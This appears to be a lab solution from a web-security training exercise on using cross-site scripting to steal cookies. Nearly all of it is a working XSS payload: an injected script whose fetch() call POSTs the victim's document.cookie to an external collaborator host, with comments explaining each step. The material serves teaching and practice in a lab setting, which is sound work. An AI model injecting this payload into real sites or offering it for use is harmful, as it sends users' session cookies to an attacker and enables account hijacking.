21 - Exploiting cross-site scripting to steal cookies

<script>
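// Lab payload: when this script runs in a victim's browser, it POSTs that
// page's cookies to the external collaborator (oastify.com) host below.
// document.cookie only exposes cookies that are not flagged HttpOnly.
fetch("https://qkezfqlzgb0mxh888sbtrjg1bshn5mtb.oastify.com", {
  method: "POST",
  headers: {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  // The raw cookie string is sent as the request body.
  body: document.cookie
});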
</script>